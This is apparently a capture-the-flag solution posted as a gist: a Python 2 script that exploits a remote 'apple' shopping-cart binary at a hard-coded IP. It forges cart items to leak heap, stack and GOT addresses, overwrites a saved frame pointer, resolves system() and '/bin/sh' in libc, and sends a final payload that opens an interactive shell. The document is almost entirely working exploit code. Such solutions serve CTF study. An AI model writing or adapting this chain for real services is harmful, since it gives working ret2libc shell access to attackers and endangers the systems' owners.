@peternguyen93
Created January 24, 2016 04:15
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import re
# p = Pwn(elf='./apple_DA0AEF582865A302F7DC56E62C4554BB')
# Module-level connection object shared by every helper below. The remote host/port
# and the local ELF path are hard-coded; the commented-out line above is the local
# variant. The actual connect() call happens later in exploit(), not here
# (assuming Pwn(...) does not connect on construction — confirm in the Pwn class).
p = Pwn(host='125.235.240.168',port=10002,elf='./apple_DA0AEF582865A302F7DC56E62C4554BB')
def add_item(item_id):
    """Walk the 'add item' menu path: option 2, then answer the device prompt.

    ``item_id`` is converted with ``str()``, so ints and strings both work.
    Talks to the target through the module-level connection object ``p``.
    """
    dialogue = [
        ('>', '2\n'),
        ('Device Number>', str(item_id) + '\n'),
    ]
    for prompt, answer in dialogue:
        p.read_until(prompt)
        p.write(answer)
def del_item(item_id):
    """Walk the 'delete item' menu path: option 3, then answer the item prompt.

    ``item_id`` is converted with ``str()``, so ints and strings both work.
    Talks to the target through the module-level connection object ``p``.
    """
    dialogue = [
        ('>', '3\n'),
        ('Item Number>', str(item_id) + '\n'),
    ]
    for prompt, answer in dialogue:
        p.read_until(prompt)
        p.write(answer)
def checkout():
    """Walk the checkout menu path: option 5, confirm with 'y', wait for the total line.

    The expected total ``$7175`` is hard-coded; if the cart contents differ the
    final read_until presumably never returns (depends on Pwn.read_until).
    """
    dialogue = (
        ('>', '5\n'),
        ('Let me check your cart. ok? (y/n)', 'y\n'),
    )
    for prompt, answer in dialogue:
        p.read_until(prompt)
        p.write(answer)
    p.read_until('Total: $7175')
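def extract(value):
    """Pull the 4-byte value listed for item 27 out of a menu listing.

    ``value`` is the text read back from the target. The first ``27: <bytes> -``
    match is taken and its first four bytes are unpacked with ``p.unpack``.

    Raises:
        ValueError: if the listing contains no item-27 entry. The original code
            indexed ``l[0]`` unconditionally and died with a bare IndexError,
            which hides the real cause (unexpected or truncated target output).
    """
    matches = re.findall(r'27: (.*) -', value)
    if not matches:
        raise ValueError("no '27: ... -' entry found in target output")
    return p.unpack(matches[0][:4])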
def exploit(**kargs):
    """Run the scripted interaction against the target behind ``p``.

    Keyword args:
        p: optional replacement connection object. It is only honoured when its
           class is literally named ``Pwn`` (a name check, not ``isinstance``).

    Notes:
        - Python 2 only: ``dict.has_key``, ``xrange`` and print statements.
        - All numeric constants, menu strings and offsets are specific to this
          binary build and the remote host's libc, as written by the author.
        - Both ``p.write`` (helpers) and ``p.send`` (here) are used to transmit;
          presumably equivalent in Pwn — confirm before relying on either.
    """
    global p  # rebind the module-level connection when a 'p' kwarg is supplied
    if kargs.has_key('p'):
        if kargs['p'].__class__.__name__ == 'Pwn':  # is pwn object
            p = kargs['p']
    p.connect()
    # raw_input('Debug>')
    # Populate the cart: six of device 1, twenty of device 2, then check out.
    # checkout() blocks on the hard-coded 'Total: $7175' line, so these counts
    # must match whatever produces that total.
    for i in xrange(6):
        add_item(1)
    for i in xrange(20):
        add_item(2)
    checkout()
    # Four-word record appended after the 'y' answer to option 4; field names
    # are the author's reading of the item structure.
    fake_item = [
        0x804b070,   # device_name (myCart->next)
        0x41414141,  # cost
        0,           # next
        0x51515151   # prev
    ]
    p.read_until('>')
    p.send('4\n')
    p.read_until('Let me check your cart. ok? (y/n) > ')
    p.send('yA' + p.pA(fake_item) + '\n')
    leak = p.read_until('>')
    heap_base = extract(leak)  # first word of the listing's item-27 entry
    print 'heap base',hex(heap_base)
    # Second round of option 4 with the first field moved relative to the value
    # just read; 1184 is a fixed offset from the author, not derived here.
    fake_item[0] = heap_base + 1184
    p.send('4\n')
    p.read_until('Let me check your cart. ok? (y/n) > ')
    p.send('yA' + p.pA(fake_item) + '\n')
    leak = p.read_until('>')
    stack_addr = extract(leak)
    print 'stack addr',hex(stack_addr)
    # Record sent with the option-3 answer; the GOT slot comes from the ELF
    # loaded into p, the two stack-relative words from the value above.
    fake_item1 = [
        p.got['atoi'],
        0x42424242,
        stack_addr + 12,
        stack_addr + 32 - 8,  # ebp
    ]
    # fake_item1 = [0x41414141]*4
    p.send('3\n')
    p.read_until('Item Number>')
    p.send('27' + p.pA(fake_item1) + '\n')  # overwrite ebp
    # The removal message echoes the entry's bytes; unpack them as an address.
    leak = p.read_until('from your shopping cart.')
    atoi_addr = re.findall(r'Remove 27:(.*) from your shopping cart.',leak)[0]
    atoi_addr = p.unpack(atoi_addr)
    # get_libc_offset returns (offset, base); only the offset is used and ``base``
    # is discarded both times. Offsets are resolved by Pwn from the atoi address.
    off,base = p.get_libc_offset(atoi_addr,'atoi')
    system_addr = atoi_addr - off
    off,base = p.get_libc_offset(atoi_addr,'atoi','/bin/sh')
    binsh_addr = atoi_addr - off
    print 'atoi()',hex(atoi_addr)
    print 'system()',hex(system_addr)
    print '/bin/sh',hex(binsh_addr)
    # Final line: two filler bytes followed by four packed words; the repeated
    # constant is annotated by the author on its second use only.
    pl = 'AA' + p.pA([
        system_addr,
        0x080487e2,
        binsh_addr,
        0x080487e2  # (c9c3) leave; ret
    ])
    p.read_until('>')
    p.send(pl + '\n')
    # p.send('AAA%AAsAABAA$AAnAACA\n')
    p.io()  # hand the connection over to the user (interactive loop, per Pwn)
# Script entry point. There is no ``if __name__ == '__main__'`` guard, so this
# also runs (and connects to the hard-coded host) whenever the module is imported.
exploit()